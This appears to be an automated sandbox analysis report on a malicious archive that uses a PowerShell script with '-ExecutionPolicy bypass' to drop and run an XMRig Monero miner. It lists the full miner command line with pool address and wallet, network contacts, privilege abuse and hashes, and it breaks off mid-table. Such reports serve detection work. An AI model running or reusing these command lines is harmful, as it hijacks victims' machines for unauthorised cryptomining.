Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 18:30
Signatures
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:40
Platform
win11-20240426-en
Max time kernel
1790s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2280 wrote to memory of 4452 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2280 wrote to memory of 4452 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2280-0-0x00007FFEBB1D3000-0x00007FFEBB1D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dqvjwge.a13.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2280-9-0x00000198B3E00000-0x00000198B3E22000-memory.dmp
memory/2280-10-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp
memory/2280-11-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp
memory/2280-12-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp
memory/2280-14-0x00000198B3EA0000-0x00000198B3EB2000-memory.dmp
memory/2280-15-0x00000198B3E90000-0x00000198B3E9A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4452-46-0x000001ACACAA0000-0x000001ACACAC0000-memory.dmp
memory/4452-47-0x000001ACACAF0000-0x000001ACACB10000-memory.dmp
memory/4452-48-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/2280-49-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp
memory/2280-50-0x00007FFEBB1D3000-0x00007FFEBB1D5000-memory.dmp
memory/4452-52-0x000001ACACB30000-0x000001ACACB50000-memory.dmp
memory/4452-51-0x000001ACACB10000-0x000001ACACB30000-memory.dmp
memory/4452-53-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-54-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-55-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-57-0x000001ACACB30000-0x000001ACACB50000-memory.dmp
memory/4452-56-0x000001ACACB10000-0x000001ACACB30000-memory.dmp
memory/4452-58-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-59-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-60-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-61-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-62-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-63-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-64-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-65-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-66-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-67-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-68-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-69-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-70-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-71-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-72-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-73-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-74-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-75-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-76-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-77-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-78-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-79-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-80-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-81-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-82-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-83-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-84-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-85-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-86-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-87-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-88-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-89-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-90-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-91-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-92-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-93-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-94-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-95-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-96-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-97-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-98-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-99-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-100-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-101-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-102-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-103-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-104-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-105-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-106-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-107-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-108-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-109-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-110-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-111-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-112-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-113-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-114-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-115-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
memory/4452-116-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:42
Platform
win10-20240404-en
Max time kernel
1800s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2900 wrote to memory of 2312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2900 wrote to memory of 2312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/2900-2-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp
memory/2900-5-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/2900-6-0x000002719C0D0000-0x000002719C0F2000-memory.dmp
memory/2900-9-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/2900-10-0x000002719C290000-0x000002719C306000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyyfydac.nof.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2900-25-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/2900-48-0x000002719C410000-0x000002719C422000-memory.dmp
memory/2900-61-0x000002719C160000-0x000002719C16A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2312-90-0x000001C7D9790000-0x000001C7D97B0000-memory.dmp
memory/2900-91-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp
memory/2900-92-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/2312-93-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2900-94-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/2312-95-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-96-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-97-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-98-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-99-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-100-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-101-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-102-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-103-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-104-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-105-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-106-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-107-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-108-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-109-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-110-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-111-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-112-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-113-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-114-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-115-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-116-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-117-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-118-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-119-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-120-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-121-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-122-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-123-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-124-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-125-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-126-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-127-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-128-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-129-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-130-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-131-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-132-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-133-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-134-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-135-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-136-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-137-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-138-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-139-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-140-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-141-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-142-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-143-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-144-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-145-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-146-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-147-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-148-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-149-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-150-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-151-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-152-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-153-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-154-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-155-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
memory/2312-156-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:44
Platform
win10v2004-20240508-en
Max time kernel
1586s
Max time network
1595s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/1788-0-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp
memory/1788-6-0x000002D8FA020000-0x000002D8FA042000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_suoxsbnw.ojt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1788-11-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/1788-12-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/1788-13-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/1788-14-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/1788-15-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/1788-16-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp
memory/1788-17-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/1788-18-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:46
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
